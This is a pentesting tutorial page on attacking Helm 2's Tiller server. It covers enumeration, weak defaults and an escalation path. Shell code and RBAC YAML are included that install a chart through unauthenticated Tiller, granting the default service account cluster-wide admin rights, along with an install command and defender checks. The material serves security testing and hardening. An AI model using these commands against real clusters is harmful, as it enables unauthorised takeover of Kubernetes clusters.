hacktricks/network-services-pentesting/44134-pentesting-tiller-helm.md
2024-02-10 17:52:19 +00:00


Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!

Other ways to support HackTricks:

Basic Information

Helm is the package manager for Kubernetes. It packages YAML manifests into Helm Charts and distributes them through public and private repositories. Tiller is the server-side component of Helm 2 that receives the client's requests and creates the resources in the cluster; by default it listens on port 44134.

Default port: 44134

PORT      STATE SERVICE VERSION
44134/tcp open  unknown

Enumeration

Look for Tiller pods and services in the default namespace, in kube-system (where Helm 2 installed Tiller by default) and in any other namespace you are allowed to list:

kubectl get pods | grep -i "tiller"
kubectl get services | grep -i "tiller"
kubectl get pods -n kube-system | grep -i "tiller"
kubectl get services -n kube-system | grep -i "tiller"
kubectl get pods -n <namespace> | grep -i "tiller"
kubectl get services -n <namespace> | grep -i "tiller"

Pentesting Tiller (Helm)

Introduction

Tiller is the server-side component of Helm 2. It runs inside the cluster, receives gRPC requests from the helm client on port 44134, renders charts (packages of templated Kubernetes resources) and creates the resulting objects using its own service account. Helm 3 removed Tiller entirely, so finding it also tells you the cluster still runs an end-of-life Helm 2 setup. Pentesting Tiller comes down to two questions: who can reach that port, and what is Tiller's service account allowed to do.

Tiller Server

The Tiller server is normally the tiller-deploy Deployment and ClusterIP Service in kube-system. The helm client usually reaches it through a kubectl port-forward, but any pod that can open a TCP connection to the ClusterIP can talk to it directly. Every request Tiller accepts is executed with the permissions of Tiller's service account, not the caller's.

Tiller Security Considerations

When pentesting Tiller, keep the following in mind:

  1. Authentication: Tiller has no authentication of its own. The only option is mutual TLS on the gRPC port (helm init --tiller-tls --tiller-tls-verify), and the default installation does not enable it. Check whether the port accepts plaintext connections from an arbitrary pod; if it does, anyone on the pod network is a fully trusted Helm user.

  2. Authorization: Tiller does not enforce RBAC on callers. Kubernetes RBAC applies to Tiller's own service account, which the common setup instructions bound to cluster-admin. Inspect the ClusterRoleBindings of that service account: whatever it can do, every caller can do.

  3. Network Security: Tiller is a ClusterIP service, so reachability depends on NetworkPolicies (absent by default) and on whether it has additionally been exposed through a NodePort, a LoadBalancer or a long-lived port-forward. Check open ports, policies and namespace segmentation.

  4. Default Configurations: A plain helm init deploys Tiller to kube-system without TLS and stores release state as ConfigMaps in kube-system. Anyone who can read those ConfigMaps, or run helm get values against Tiller, can recover chart values, which frequently contain credentials.

  5. Logging and Monitoring: Tiller itself produces little audit information; the useful trail is the Kubernetes audit log, where Tiller's service account appears as the user for every object it creates. Check whether unexpected releases or new RBAC objects created by that account would be noticed.

Tiller Attack Vectors

During a Tiller pentest, the following attack vectors can be explored:

  1. Unauthorized Access: Reach the port from a compromised pod or an exposed endpoint and run helm commands without any TLS client certificate.

  2. Privilege Escalation: Install a chart whose templates create ClusterRole and ClusterRoleBinding objects for an identity you control; Tiller's service account creates them on your behalf (the helm-tiller-pwn chart described further down does exactly this).

  3. Chart Manipulation: With access to Tiller you can upgrade existing releases with tampered charts or read their values; with access to the chart repository the operators use, you can backdoor charts before they are installed.

  4. Denial of Service: Tiller applies no per-client limits, so a flood of installs, or deleting release state, disrupts deployments.

Conclusion

An exposed, unauthenticated Tiller whose service account is cluster-admin is effectively a cluster-admin shell for anyone on the pod network. The fix is to retire Helm 2 or, failing that, to enable Tiller TLS, restrict its service account and limit network access to the port.

kubectl get pods -n kube-system
NAME                                       READY   STATUS             RESTARTS   AGE
kube-scheduler-controlplane                1/1     Running            0          35m
tiller-deploy-56b574c76d-l265z             1/1     Running            0          35m

kubectl get services -n kube-system
NAME            TYPE        CLUSTER-IP     EXTERNAL-IP   PORT(S)                  AGE
kube-dns        ClusterIP   10.96.0.10     <none>        53/UDP,53/TCP,9153/TCP   35m
tiller-deploy   ClusterIP   10.98.57.159   <none>        44134/TCP                35m
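As an added example (not from the original page or from HackTricks), the following POSIX shell helper reads `kubectl get services -A` output and flags Tiller candidates by name or by the 44134 port, because a renamed deployment still has to expose Tiller's gRPC port. The service listing embedded in the script is constructed to mirror the output above plus one renamed service in a hypothetical `helm-infra` namespace; `helm_host` turns a hit into the in-cluster `<service>.<namespace>:<port>` string that `helm --host` expects.

```shell
#!/bin/sh
# Added example, not from the original page: find Tiller candidates in
# `kubectl get services -A` output by name OR by port, since an operator may
# rename the deployment but Tiller's gRPC port (44134) usually stays.
# SAMPLE_SERVICES is constructed: it mirrors the page's kube-system listing
# and adds a renamed Tiller in a hypothetical helm-infra namespace.

SAMPLE_SERVICES='NAMESPACE     NAME            TYPE        CLUSTER-IP      EXTERNAL-IP   PORT(S)                  AGE
default       kubernetes      ClusterIP   10.96.0.1       <none>        443/TCP                  35m
kube-system   kube-dns        ClusterIP   10.96.0.10      <none>        53/UDP,53/TCP,9153/TCP   35m
kube-system   tiller-deploy   ClusterIP   10.98.57.159    <none>        44134/TCP                35m
helm-infra    release-mgr     ClusterIP   10.105.12.7     <none>        44134/TCP                12d'

# tiller_candidates: read `kubectl get services -A` text on stdin and print
# "<namespace>/<name> <cluster-ip>:<port>" for every service whose name
# contains "tiller" or whose PORT(S) column lists 44134.
tiller_candidates() {
  awk 'NR > 1 && (tolower($2) ~ /tiller/ || $6 ~ /(^|,)44134\//) {
         port = "44134"
         # matched only by name: fall back to the first port the service lists
         if ($6 !~ /(^|,)44134\//) { split($6, p, "/"); port = p[1] }
         printf "%s/%s %s:%s\n", $1, $2, $4, port
       }'
}

# helm_host: build the --host argument for the Helm 2 client from one
# candidate line; the in-cluster DNS name of a service is <name>.<namespace>
helm_host() {
  ns=${1%%/*}
  rest=${1#*/}
  name=${rest%% *}
  port=${1##*:}
  printf '%s.%s:%s\n' "$name" "$ns" "$port"
}

# Offline run over the constructed sample
tiller_candidates_from_sample() {
  printf '%s\n' "$SAMPLE_SERVICES" | tiller_candidates
}

# Live usage (needs cluster access):
#   kubectl get services -A | tiller_candidates
#   helm --host "$(helm_host "kube-system/tiller-deploy 10.98.57.159:44134")" version
```

Matching on the port as well as the name is the point: `grep -i tiller` misses the renamed `release-mgr` service, while the 44134 rule catches it.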

You can also check whether port 44134 is reachable from your position (for example from inside a compromised pod) with nmap:

sudo nmap -sS -p 44134 <IP>

Next you need the Helm client. Tiller only speaks the Helm 2 protocol, so install a Helm 2 (v2.x) binary: Helm 3 dropped Tiller and no longer has the --host flag. Helm 2 binaries are available from the official releases page on GitHub (Homebrew and other package managers may only offer Helm 3), and the Helm 2 installation guide lists further options.

Then point the client at the service and enumerate it. The --host argument (or the HELM_HOST environment variable) takes <service>.<namespace>:<port>; a version reply from Tiller confirms that it accepts unauthenticated connections:

helm --host tiller-deploy.kube-system:44134 version

Privilege Escalation

By default Helm 2 installed Tiller in the kube-system namespace with high privileges (the usual setup bound its service account to cluster-admin), and Tiller executes every request with its own service account rather than the caller's. So if you find the service and can reach it without TLS client authentication, you can use it to escalate to whatever Tiller is allowed to do.

All you need to do is install a chart that creates the RBAC objects you want, for example https://github.com/Ruil1n/helm-tiller-pwn, which gives the default service account token access to everything in the whole cluster:

git clone https://github.com/Ruil1n/helm-tiller-pwn
helm --host tiller-deploy.kube-system:44134 install --name pwnchart helm-tiller-pwn/pwnchart

An explanation of the attack is available at http://rui0.cn/archives/1573. In short, the files clusterrole.yaml and clusterrolebinding.yaml in helm-tiller-pwn/pwnchart/templates/ create a ClusterRole with all privileges and bind it to the default service account token; Tiller creates both objects because its own service account is allowed to. Afterwards any pod running as that default service account, and any attacker holding its token, is cluster-admin-equivalent.
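To make the escalation concrete, here is an added example (my own reconstruction, not the files from the helm-tiller-pwn repository or from HackTricks): a shell function that writes a minimal Helm 2 chart whose two templates have the effect the text describes, a wildcard ClusterRole and a ClusterRoleBinding attaching it to the `default` ServiceAccount in the `default` namespace. The chart name `pwnchart` and the object name `{{ .Release.Name }}-all` are my choices. The install and verification commands sit in comments because they need a live cluster; the defender-side check at the end shows what the attack leaves behind.

```shell
#!/bin/sh
# Added example, not the helm-tiller-pwn repository's own files: a minimal
# Helm 2 chart whose only templates are a ClusterRole granting every verb on
# every resource and a ClusterRoleBinding attaching it to the `default`
# ServiceAccount of the `default` namespace. File contents are my
# reconstruction of the effect the page describes.

# write_pwnchart DIR: create the chart skeleton under DIR
write_pwnchart() {
  dir=$1
  mkdir -p "$dir/templates"

  # Helm 2 charts use Chart.yaml apiVersion v1
  cat > "$dir/Chart.yaml" <<'EOF'
apiVersion: v1
name: pwnchart
version: 0.1.0
description: ClusterRole + ClusterRoleBinding for the default service account (pentest example)
EOF

  # Wildcard role: every verb on every resource and every non-resource URL
  cat > "$dir/templates/clusterrole.yaml" <<'EOF'
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRole
metadata:
  name: {{ .Release.Name }}-all
rules:
- apiGroups: ["*"]
  resources: ["*"]
  verbs: ["*"]
- nonResourceURLs: ["*"]
  verbs: ["*"]
EOF

  # Bind it to the default service account; Tiller's own SA does the creating
  cat > "$dir/templates/clusterrolebinding.yaml" <<'EOF'
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRoleBinding
metadata:
  name: {{ .Release.Name }}-all
roleRef:
  apiGroup: rbac.authorization.k8s.io
  kind: ClusterRole
  name: {{ .Release.Name }}-all
subjects:
- kind: ServiceAccount
  name: default
  namespace: default
EOF
}

# chart_grants_cluster_wide_to_default DIR: succeed (0) if the chart binds a
# wildcard ClusterRole to the default ServiceAccount, i.e. the pattern a
# reviewer of a chart repository would grep for
chart_grants_cluster_wide_to_default() {
  dir=$1
  grep -q 'kind: ClusterRole$' "$dir/templates/clusterrole.yaml" &&
  grep -q 'verbs: \["\*"\]' "$dir/templates/clusterrole.yaml" &&
  grep -q 'kind: ClusterRoleBinding' "$dir/templates/clusterrolebinding.yaml" &&
  grep -q 'name: default' "$dir/templates/clusterrolebinding.yaml"
}

# Live usage against an exposed Tiller (Helm 2 client required; not run here):
#   write_pwnchart ./pwnchart
#   helm --host tiller-deploy.kube-system:44134 install --name pwnchart ./pwnchart
#   # verify the default service account is now cluster-admin-equivalent:
#   kubectl auth can-i '*' '*' --as=system:serviceaccount:default:default
#   # defender check: which ClusterRoleBindings hand a cluster role to the default SA
#   kubectl get clusterrolebindings -o json | jq -r '.items[] | select(.subjects[]? | .kind=="ServiceAccount" and .name=="default") | .metadata.name'
```

Nothing here exploits a bug in Tiller: the chart is ordinary RBAC YAML, and the escalation works only because Tiller renders and applies it with its own, over-privileged service account.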
